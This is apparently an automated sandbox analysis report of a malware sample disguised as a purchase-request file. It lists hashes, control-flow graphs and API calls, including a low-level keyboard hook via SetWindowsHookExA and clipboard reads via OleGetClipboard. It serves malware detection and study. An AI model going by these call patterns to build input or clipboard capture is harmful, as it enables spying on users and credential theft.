                                        • Source File: 00000004.00000002.4180819043.0000000000E1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E1D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_e1d000_PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0b8260daa10cf32875251b9ede1b089ffb7b0bbcbb60cf725605a7c3def9c549
                                        • Instruction ID: 6504e0b66c7ef6a72123762a7dd92b3e5d2e0d0ea7d49185e2392ca16e1fbb14
                                        • Opcode Fuzzy Hash: 0b8260daa10cf32875251b9ede1b089ffb7b0bbcbb60cf725605a7c3def9c549
                                        • Instruction Fuzzy Hash: E421F275608340DFDB14DF14D980B56BBA6FB88318F20C56DD84A5B286C33AD887CA62
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.4180819043.0000000000E1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E1D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_e1d000_PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ed087a560cee9de6ec61d0c40e942ff4203cbea16e1eb3919679c0928320a4d8
                                        • Instruction ID: 2c07ecb210c3da4c6e59aad583270902610756de62a12454d5e4b0acbadc3967
                                        • Opcode Fuzzy Hash: ed087a560cee9de6ec61d0c40e942ff4203cbea16e1eb3919679c0928320a4d8
                                        • Instruction Fuzzy Hash: 7A2104B1609344EFDB04DF20CDC0B56BBA5FB84318F20C56DE90A5B256C33AD886CA61
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.4180819043.0000000000E1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E1D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_e1d000_PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d5857f280341d6755fdc3cdfc1cf2c5697e544aa6009c84f0f6c98a461b9e743
                                        • Instruction ID: cabb390d15bb9e7bf64d9f2585a9dbbb8d7169dde90fe47d3495208649a00ec0
                                        • Opcode Fuzzy Hash: d5857f280341d6755fdc3cdfc1cf2c5697e544aa6009c84f0f6c98a461b9e743
                                        • Instruction Fuzzy Hash: 6121537550D3C08FC712CF24D994755BF71EB46318F28C5EAD8498B6A7C33A984ACB62
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.4180819043.0000000000E1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E1D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_e1d000_PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 82c1591fb7cb945e1b6a1ce8599ed47a39f5d479b331759251bd4a9e08807f4d
                                        • Instruction ID: 89ec2dc03a6b43af803bcc577e5c43aaa180a15e6562517eb892f65bccf10ac2
                                        • Opcode Fuzzy Hash: 82c1591fb7cb945e1b6a1ce8599ed47a39f5d479b331759251bd4a9e08807f4d
                                        • Instruction Fuzzy Hash: 7A11DD75608680DFCB05CF10C9C4B15BFB1FB84318F24C6ADD8494B656C33AD88ACB51

                                        Execution Graph

                                        Execution Coverage:4.9%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:0%
                                        Total number of Nodes:33
                                        Total number of Limit Nodes:5
                                        (execution graph image omitted; the graph nodes reference CreateActCtxA, GetCurrentProcess, GetCurrentThread, GetCurrentThreadId, DuplicateHandle and GetModuleHandleW)

                                        Control-flow Graph

                                        APIs
                                        • GetCurrentProcess.KERNEL32 ref: 02C8D216
                                        • GetCurrentThread.KERNEL32 ref: 02C8D253
                                        • GetCurrentProcess.KERNEL32 ref: 02C8D290
                                        • GetCurrentThreadId.KERNEL32 ref: 02C8D2E9
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1867850330.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2c80000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: Current$ProcessThread
                                        • String ID:
                                        • API String ID: 2063062207-0
                                        • Opcode ID: 5b4c62c1920d8ef792ce7bbfac7da961f8f7122fedf3b92246b8bc6cfcccd860
                                        • Instruction ID: 9b5982f42a0fdfcdef97170e0702f7bc7e0ea0dd31d646b4cdb0793fd7bf530b
                                        • Opcode Fuzzy Hash: 5b4c62c1920d8ef792ce7bbfac7da961f8f7122fedf3b92246b8bc6cfcccd860
                                        • Instruction Fuzzy Hash: CB5167B091174A8FDB04DFA9D548BDEBBF1BF88304F208459E01AA73A1DB749944CF66

                                        Control-flow Graph

                                        APIs
                                        • GetCurrentProcess.KERNEL32 ref: 02C8D216
                                        • GetCurrentThread.KERNEL32 ref: 02C8D253
                                        • GetCurrentProcess.KERNEL32 ref: 02C8D290
                                        • GetCurrentThreadId.KERNEL32 ref: 02C8D2E9
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1867850330.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2c80000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: Current$ProcessThread
                                        • String ID:
                                        • API String ID: 2063062207-0
                                        • Opcode ID: 64fc3489817f4aa3f908d6b692c9d1466eb9dc9703f7722727a2a89db49ac1f9
                                        • Instruction ID: ca66058b37e5d343f491e25475075107410bed5691da21c26b0a862230ed8713
                                        • Opcode Fuzzy Hash: 64fc3489817f4aa3f908d6b692c9d1466eb9dc9703f7722727a2a89db49ac1f9
                                        • Instruction Fuzzy Hash: D25178B090174A8FDB14DFAAD548B9EBBF1FF88304F208459E019A7391DB749944CF66

                                        Control-flow Graph (graph image omitted; legend: Executed / Not Executed)
                                        APIs
                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 02C8B03E
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1867850330.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2c80000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0
                                        • Opcode ID: 8dd5ebd63c453a500803cb32d00ecb6204eb0680253acd454ceef0a475d25255
                                        • Instruction ID: f0cb84e5a821d9bef8da2216d3ed544818edd33c912d962b2b43a849a60aa5db
                                        • Opcode Fuzzy Hash: 8dd5ebd63c453a500803cb32d00ecb6204eb0680253acd454ceef0a475d25255
                                        • Instruction Fuzzy Hash: 55814871A00B458FDB24EF29D44479ABBF1BF88308F108A2ED48AD7A40DB75E955CF90

                                        Control-flow Graph (graph image omitted; legend: Executed / Not Executed)
                                        APIs
                                        • CreateActCtxA.KERNEL32(?), ref: 02C859C9
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1867850330.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2c80000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: Create
                                        • String ID:
                                        • API String ID: 2289755597-0
                                        • Opcode ID: 3918228bb8caa6f57baae224a08eb7f7e1209b3666811709d871bea59c8edf7a
                                        • Instruction ID: 9e42d99f27a2593ac8f57c20ab02e705486a7a850cb715fa0ec3573a24b5d5ff
                                        • Opcode Fuzzy Hash: 3918228bb8caa6f57baae224a08eb7f7e1209b3666811709d871bea59c8edf7a
                                        • Instruction Fuzzy Hash: F251F2B1D01719CFDB24DFA5C8847DEBBF1AF48308F61806AD408AB251D7B56A4ACF50

                                        Control-flow Graph

                                        control_flow_graph 130 2c844d4-2c859d9 CreateActCtxA 133 2c859db-2c859e1 130->133 134 2c859e2-2c85a3c 130->134 133->134 141 2c85a4b-2c85a4f 134->141 142 2c85a3e-2c85a41 134->142 143 2c85a60-2c85a90 141->143 144 2c85a51-2c85a5d 141->144 142->141 148 2c85a42-2c85a4a 143->148 149 2c85a92-2c85b14 143->149 144->143 148->141 152 2c859cf-2c859d9 148->152 152->133 152->134
                                        APIs
                                        • CreateActCtxA.KERNEL32(?), ref: 02C859C9
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1867850330.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2c80000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: Create
                                        • String ID:
                                        • API String ID: 2289755597-0
                                        • Opcode ID: 3a1b70bc70cea8a665c61582d1c648d6dcee3c09ed0ef9faf2d68aec99760e2f
                                        • Instruction ID: a1303869161ace63cdc5c8a19e24cae940b3c7e615494dc944eaab9af5e0c98d
                                        • Opcode Fuzzy Hash: 3a1b70bc70cea8a665c61582d1c648d6dcee3c09ed0ef9faf2d68aec99760e2f
                                        • Instruction Fuzzy Hash: 5441C070D01719CFDB24DFA9C8847DEBBB5BF48704F61806AD408AB251DBB5694ACF90

                                        Control-flow Graph

                                        control_flow_graph 153 2c8d3e0-2c8d474 DuplicateHandle 154 2c8d47d-2c8d49a 153->154 155 2c8d476-2c8d47c 153->155 155->154
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02C8D467
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1867850330.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2c80000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0
                                        • Opcode ID: 9a21146e4c0f71d0424e65671fab54700081a0a49335637eda56a0626c68035d
                                        • Instruction ID: 31c277c0da50a0e247448961b7b80db7f07992866bf60667ec7da0cb1ccf63cd
                                        • Opcode Fuzzy Hash: 9a21146e4c0f71d0424e65671fab54700081a0a49335637eda56a0626c68035d
                                        • Instruction Fuzzy Hash: 8821E4B5900249EFDB10CFAAD484ADEBBF4EB48310F14841AE915A3350D374A944CF65

                                        Control-flow Graph

                                        control_flow_graph 158 2c8d3d9-2c8d474 DuplicateHandle 159 2c8d47d-2c8d49a 158->159 160 2c8d476-2c8d47c 158->160 160->159
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02C8D467
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1867850330.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2c80000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0
                                        • Opcode ID: 161a2ee5452c4e76c3fe0d943bf3d58b79455c95a6002655d770d535f0e1e088
                                        • Instruction ID: d158ed4258a610670be38649dafa2bb201a963704218223625eb012495124fab
                                        • Opcode Fuzzy Hash: 161a2ee5452c4e76c3fe0d943bf3d58b79455c95a6002655d770d535f0e1e088
                                        • Instruction Fuzzy Hash: 8821E2B5D00249DFDB10CFAAD584ADEBBF4FB48314F14841AE919A3250D378A944CF65

                                        Control-flow Graph

                                        control_flow_graph 163 2c8afd8-2c8b018 164 2c8b01a-2c8b01d 163->164 165 2c8b020-2c8b04b GetModuleHandleW 163->165 164->165 166 2c8b04d-2c8b053 165->166 167 2c8b054-2c8b068 165->167 166->167
                                        APIs
                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 02C8B03E
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1867850330.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2c80000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0
                                        • Opcode ID: be46f252e1fe6f7625a6df7044ae3e23f91fbc74a703a3b5db17dd1706eec6c6
                                        • Instruction ID: f4779a4c4905ac7cb8c786b64edf05e2a3b1909a0a7b71f75799b1ad8c6d972a
                                        • Opcode Fuzzy Hash: be46f252e1fe6f7625a6df7044ae3e23f91fbc74a703a3b5db17dd1706eec6c6
                                        • Instruction Fuzzy Hash: D91110B5C007498FDB20DF9AD444BDEFBF4FB88218F20841AD429A7210D379AA45CFA1
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1867106069.0000000002A7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A7D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2a7d000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0194b18e513b190c9b64452e63fe0fd37b7ff512e939e488be3284e580d1ee17
                                        • Instruction ID: f21f47d88de37eda150cf6dc667166a29a2e1bb908045717107e89d0afc45cda
                                        • Opcode Fuzzy Hash: 0194b18e513b190c9b64452e63fe0fd37b7ff512e939e488be3284e580d1ee17
                                        • Instruction Fuzzy Hash: A221F172604740DFDB05DF10D8C0B26FB65FF98214F24C569E9090A246CB36D417CBA6
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1867106069.0000000002A7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A7D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2a7d000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fc1de35b3fe13f0cfda23a7a6fb024e57a4e17c105a254729d441b926f7567aa
                                        • Instruction ID: 89b08974834d5af1339a627c4fce46cdbf4fe618ed55366dca11dec1f4e96996
                                        • Opcode Fuzzy Hash: fc1de35b3fe13f0cfda23a7a6fb024e57a4e17c105a254729d441b926f7567aa
                                        • Instruction Fuzzy Hash: 6D210371500640DFDB05DF10D9C0B26BF65FF88718F24C569E9090B256C736D456CBA6
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1867267593.0000000002A8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A8D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2a8d000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 14b07b5236ed9b106747dc46522e74081081387dda2eb75e9c49049d18a4e75f
                                        • Instruction ID: f6eedbde898b464c14e77229f2ca531fdf5ab4ce6764ac70eac16ed5e26c6a45
                                        • Opcode Fuzzy Hash: 14b07b5236ed9b106747dc46522e74081081387dda2eb75e9c49049d18a4e75f
                                        • Instruction Fuzzy Hash: FD21F271604B44EFDB14EF20D9C0B16BBB5FB84314F20C569D84A4B286CB3AD847CA62
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1867267593.0000000002A8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A8D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2a8d000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 09bd249b195f5e592afa55d00628cd33f663d66c069aa87fbed018db29aac758
                                        • Instruction ID: 5ea8672131ebbaccab91f023de1ce8df8279e64982b373a03f4e81f352fa3340
                                        • Opcode Fuzzy Hash: 09bd249b195f5e592afa55d00628cd33f663d66c069aa87fbed018db29aac758
                                        • Instruction Fuzzy Hash: F721F2B1504644EFDB05EF20D9C0B26FBB5FB88314F20C66DE8494B292DB36D846CA62
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1867267593.0000000002A8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A8D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2a8d000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 57abc3b8adb7c4d8d676654cf76a419f99b8a0788b127eaa8f6766a00fb35665
                                        • Instruction ID: 4b540df0ba802d20dc428dc661dc839c37cf8c1d21a65d4c7678d589b6df0901
                                        • Opcode Fuzzy Hash: 57abc3b8adb7c4d8d676654cf76a419f99b8a0788b127eaa8f6766a00fb35665
                                        • Instruction Fuzzy Hash: DA2180755087809FCB02DF24D9D4711BF71EB46214F28C5EAD8498B2A7C33A9846CB62
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1867106069.0000000002A7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A7D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2a7d000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ed047447bd486b7177fd6f5a6328ccc2b655c600b881774d0be4f41f3027c7dc
                                        • Instruction ID: 753d06265284b960100fd8b4fdf5d902ff0ae029be0e7ba912202a7d1cca94db
                                        • Opcode Fuzzy Hash: ed047447bd486b7177fd6f5a6328ccc2b655c600b881774d0be4f41f3027c7dc
                                        • Instruction Fuzzy Hash: 74218976504680DFCB06CF50D9C4B16FF62FB88214F2886A9DD090A656C33AD46ACBA2
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1867106069.0000000002A7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A7D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2a7d000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 510a4494be8f8f37c5290ac1f004916700623b455eed770fed4643cd7704ed07
                                        • Instruction ID: 7d12b4761eeea5f5f1381e6ba0d4b088b68181426d55e56232c75d653dcf69c9
                                        • Opcode Fuzzy Hash: 510a4494be8f8f37c5290ac1f004916700623b455eed770fed4643cd7704ed07
                                        • Instruction Fuzzy Hash: 8411E276504680CFCB16CF10D9C4B16BF72FF88328F24C6A9D8490B656C33AD45ACBA2
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1867267593.0000000002A8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A8D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2a8d000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c968dcaa042c25ee6ba8684c53e35a7e88ce7353a734fe3290a9ec7f8938d7ca
                                        • Instruction ID: ee3fb360b299699be2010961d8360a266dfb57fd7bbcf92c18c80845c80dbb65
                                        • Opcode Fuzzy Hash: c968dcaa042c25ee6ba8684c53e35a7e88ce7353a734fe3290a9ec7f8938d7ca
                                        • Instruction Fuzzy Hash: 6F11DD75504680DFCB01DF20C5C0B15FBB1FB84318F24C6ADD8494B696D33AD45ACB62
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1867106069.0000000002A7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A7D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2a7d000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9c88d78709091537906bcbb7139098afc92a800bef6202f4e9c7493586de47ac
                                        • Instruction ID: dbc3c375e4821b4b3efb720c9f2b97f17b64642f2cb1275c86ff4dabe95908b9
                                        • Opcode Fuzzy Hash: 9c88d78709091537906bcbb7139098afc92a800bef6202f4e9c7493586de47ac
                                        • Instruction Fuzzy Hash: 7201F971108B40DFE7105B25CCC4B67FBE8EF81624F18C55AED190E286DB799840CAB6
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1867106069.0000000002A7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A7D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2a7d000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d235909177bb44e0a129d160392b695df85ba356625d4618e226d640a6e30ede
                                        • Instruction ID: 79c89c78e60cd6f5a2fb7ad03ffa34f8dd6afdad5b8bc9a1a9cce789d2353739
                                        • Opcode Fuzzy Hash: d235909177bb44e0a129d160392b695df85ba356625d4618e226d640a6e30ede
                                        • Instruction Fuzzy Hash: 9BF0C231004740AEE7108B06CCC4B62FBA8EF81624F18C45AED580A286D3799844CAB1

                                        Execution Graph

                                        Execution Coverage: 11%
                                        Dynamic/Decrypted Code Coverage: 93.6%
                                        Signature Coverage: 1.5%
                                        Total number of Nodes: 203
                                        Total number of Limit Nodes: 25
                                        execution_graph 25769 a9d01c 25770 a9d034 25769->25770 25771 a9d08e 25770->25771 25776 5c66c34 25770->25776 25784 5c6d2b1 25770->25784 25792 5c68b30 25770->25792 25796 5c68b22 25770->25796 25777 5c66c3f 25776->25777 25778 5c6d341 25777->25778 25781 5c6d331 25777->25781 25812 5c6c28c 25778->25812 25780 5c6d33f 25800 5c6d458 25781->25800 25806 5c6d468 25781->25806 25786 5c6d2ba 25784->25786 25785 5c6d341 25787 5c6c28c 2 API calls 25785->25787 25786->25785 25788 5c6d331 25786->25788 25789 5c6d33f 25787->25789 25790 5c6d458 2 API calls 25788->25790 25791 5c6d468 2 API calls 25788->25791 25790->25789 25791->25789 25793 5c68b56 25792->25793 25794 5c66c34 2 API calls 25793->25794 25795 5c68b77 25794->25795 25795->25771 25797 5c68b30 25796->25797 25798 5c66c34 2 API calls 25797->25798 25799 5c68b77 25798->25799 25799->25771 25802 5c6d476 25800->25802 25801 5c6c28c 2 API calls 25801->25802 25802->25801 25803 5c6d552 25802->25803 25819 5c6d930 25802->25819 25824 5c6d940 25802->25824 25803->25780 25808 5c6d476 25806->25808 25807 5c6c28c 2 API calls 25807->25808 25808->25807 25809 5c6d552 25808->25809 25810 5c6d940 OleGetClipboard 25808->25810 25811 5c6d930 OleGetClipboard 25808->25811 25809->25780 25810->25808 25811->25808 25813 5c6c297 25812->25813 25814 5c6d654 25813->25814 25815 5c6d5aa 25813->25815 25816 5c66c34 OleGetClipboard 25814->25816 25817 5c6d602 CallWindowProcW 25815->25817 25818 5c6d5b1 25815->25818 25816->25818 25817->25818 25818->25780 25821 5c6d93e 25819->25821 25820 5c6d9e6 25820->25802 25821->25820 25829 5c6deb7 25821->25829 25835 5c6df00 25821->25835 25825 5c6d95f 25824->25825 25826 5c6d9e6 25825->25826 25827 5c6deb7 OleGetClipboard 25825->25827 25828 5c6df00 OleGetClipboard 25825->25828 25826->25802 25827->25825 25828->25825 25831 5c6debb 25829->25831 25830 5c6df1c 25830->25821 25831->25830 25841 5c6df48 25831->25841 25852 5c6df38 25831->25852 25832 5c6df31 25832->25821 25837 5c6df08 25835->25837 25836 5c6df1c 
25836->25821 25837->25836 25839 5c6df48 OleGetClipboard 25837->25839 25840 5c6df38 OleGetClipboard 25837->25840 25838 5c6df31 25838->25821 25839->25838 25840->25838 25842 5c6df5a 25841->25842 25843 5c6df75 25842->25843 25845 5c6dfb9 25842->25845 25848 5c6df48 OleGetClipboard 25843->25848 25849 5c6df38 OleGetClipboard 25843->25849 25844 5c6df7b 25844->25832 25847 5c6e039 25845->25847 25863 5c6e200 25845->25863 25867 5c6e210 25845->25867 25846 5c6e057 25846->25832 25847->25832 25848->25844 25849->25844 25853 5c6df5a 25852->25853 25854 5c6df75 25853->25854 25856 5c6dfb9 25853->25856 25861 5c6df48 OleGetClipboard 25854->25861 25862 5c6df38 OleGetClipboard 25854->25862 25855 5c6df7b 25855->25832 25858 5c6e039 25856->25858 25859 5c6e200 OleGetClipboard 25856->25859 25860 5c6e210 OleGetClipboard 25856->25860 25857 5c6e057 25857->25832 25858->25832 25859->25857 25860->25857 25861->25855 25862->25855 25865 5c6e210 25863->25865 25866 5c6e24b 25865->25866 25871 5c6dca0 25865->25871 25866->25846 25869 5c6e225 25867->25869 25868 5c6dca0 OleGetClipboard 25868->25869 25869->25868 25870 5c6e24b 25869->25870 25870->25846 25872 5c6e2b8 OleGetClipboard 25871->25872 25874 5c6e352 25872->25874 25630 5c6e120 25631 5c6e12b 25630->25631 25632 5c6e13b 25631->25632 25634 5c6db8c 25631->25634 25635 5c6e170 OleInitialize 25634->25635 25636 5c6e1d4 25635->25636 25636->25632 25637 26f0848 25639 26f084e 25637->25639 25638 26f091b 25639->25638 25642 26f149b 25639->25642 25650 26f1380 25639->25650 25644 26f1396 25642->25644 25643 26f1494 25643->25639 25644->25643 25649 26f149b 4 API calls 25644->25649 25659 5c658db 25644->25659 25665 5c658f0 25644->25665 25671 5c6fba0 25644->25671 25677 5c6fb8f 25644->25677 25649->25644 25651 26f135b 25650->25651 25653 26f1383 25650->25653 25651->25639 25652 26f1494 25652->25639 25653->25652 25654 5c658f0 3 API calls 25653->25654 25655 5c658db 3 API calls 25653->25655 25656 26f149b 4 API calls 25653->25656 25657 5c6fba0 SetWindowsHookExA 25653->25657 25658 5c6fb8f 
SetWindowsHookExA 25653->25658 25654->25653 25655->25653 25656->25653 25657->25653 25658->25653 25660 5c658e5 25659->25660 25663 5c659b3 25660->25663 25683 5c603a4 25660->25683 25662 5c65979 25688 5c603c4 25662->25688 25663->25644 25666 5c65902 25665->25666 25667 5c603a4 2 API calls 25666->25667 25668 5c659b3 25666->25668 25669 5c65979 25667->25669 25668->25644 25670 5c603c4 KiUserCallbackDispatcher 25669->25670 25670->25668 25672 5c6fba8 25671->25672 25673 5c6fbed 25672->25673 25749 5c6fc82 25672->25749 25753 5c6fbf0 25672->25753 25757 5c6fc00 25672->25757 25673->25644 25678 5c6fba8 25677->25678 25679 5c6fbed 25678->25679 25680 5c6fc82 SetWindowsHookExA 25678->25680 25681 5c6fc00 SetWindowsHookExA 25678->25681 25682 5c6fbf0 SetWindowsHookExA 25678->25682 25679->25644 25680->25678 25681->25678 25682->25678 25684 5c603af 25683->25684 25692 5c66eb0 25684->25692 25701 5c66ea1 25684->25701 25685 5c65f5a 25685->25662 25689 5c603cf 25688->25689 25691 5c6d88b 25689->25691 25745 5c6c2e4 25689->25745 25691->25663 25693 5c66edb 25692->25693 25710 5c67420 25693->25710 25715 5c673f0 25693->25715 25694 5c66f5e 25695 5c65e4c GetModuleHandleW 25694->25695 25697 5c66f8a 25694->25697 25696 5c66fce 25695->25696 25700 5c6892d CreateWindowExW 25696->25700 25700->25697 25702 5c66edb 25701->25702 25708 5c67420 GetModuleHandleW 25702->25708 25709 5c673f0 GetModuleHandleW 25702->25709 25703 5c66f5e 25704 5c65e4c GetModuleHandleW 25703->25704 25706 5c66f8a 25703->25706 25705 5c66fce 25704->25705 25740 5c6892d 25705->25740 25708->25703 25709->25703 25712 5c6744d 25710->25712 25711 5c674ce 25712->25711 25720 5c67683 25712->25720 25728 5c675ef 25712->25728 25716 5c67420 25715->25716 25717 5c674ce 25716->25717 25718 5c67683 GetModuleHandleW 25716->25718 25719 5c675ef GetModuleHandleW 25716->25719 25718->25717 25719->25717 25721 5c676af 25720->25721 25736 5c65e4c 25721->25736 25723 5c6771a 25724 5c65e4c GetModuleHandleW 25723->25724 25725 5c67794 25723->25725 25726 5c67768 25724->25726 
25725->25711 25726->25725 25727 5c65e4c GetModuleHandleW 25726->25727 25727->25725 25729 5c675fa 25728->25729 25730 5c65e4c GetModuleHandleW 25729->25730 25731 5c6771a 25730->25731 25732 5c65e4c GetModuleHandleW 25731->25732 25735 5c67794 25731->25735 25733 5c67768 25732->25733 25734 5c65e4c GetModuleHandleW 25733->25734 25733->25735 25734->25735 25735->25711 25737 5c678d0 GetModuleHandleW 25736->25737 25739 5c67945 25737->25739 25739->25723 25741 5c68965 CreateWindowExW 25740->25741 25742 5c68931 25740->25742 25744 5c68a9c 25741->25744 25742->25706 25746 5c6d8a0 KiUserCallbackDispatcher 25745->25746 25748 5c6d90e 25746->25748 25748->25689 25751 5c6fc3d 25749->25751 25750 5c6fc90 25750->25672 25751->25750 25761 5c6ee00 25751->25761 25755 5c6fc1d 25753->25755 25754 5c6fc90 25754->25672 25755->25754 25756 5c6ee00 SetWindowsHookExA 25755->25756 25756->25755 25759 5c6fc1d 25757->25759 25758 5c6fc90 25758->25672 25759->25758 25760 5c6ee00 SetWindowsHookExA 25759->25760 25760->25759 25762 5c6fe08 SetWindowsHookExA 25761->25762 25764 5c6fe92 25762->25764 25764->25751 25765 5c678ca 25766 5c678d0 GetModuleHandleW 25765->25766 25768 5c67945 25766->25768 25875 5c6c6d8 DuplicateHandle 25876 5c6c76e 25875->25876

                                        Control-flow Graph

                                        control_flow_graph 149 5c6ee00-5c6fe52 152 5c6fe54-5c6fe5c 149->152 153 5c6fe5e-5c6fe90 SetWindowsHookExA 149->153 152->153 154 5c6fe92-5c6fe98 153->154 155 5c6fe99-5c6feb9 153->155 154->155
                                        APIs
                                        • SetWindowsHookExA.USER32(0000000D,00000000,?,?,?,?,?,?,?,?,?,05C6FC70,00000000,00000000), ref: 05C6FE83
                                        Strings
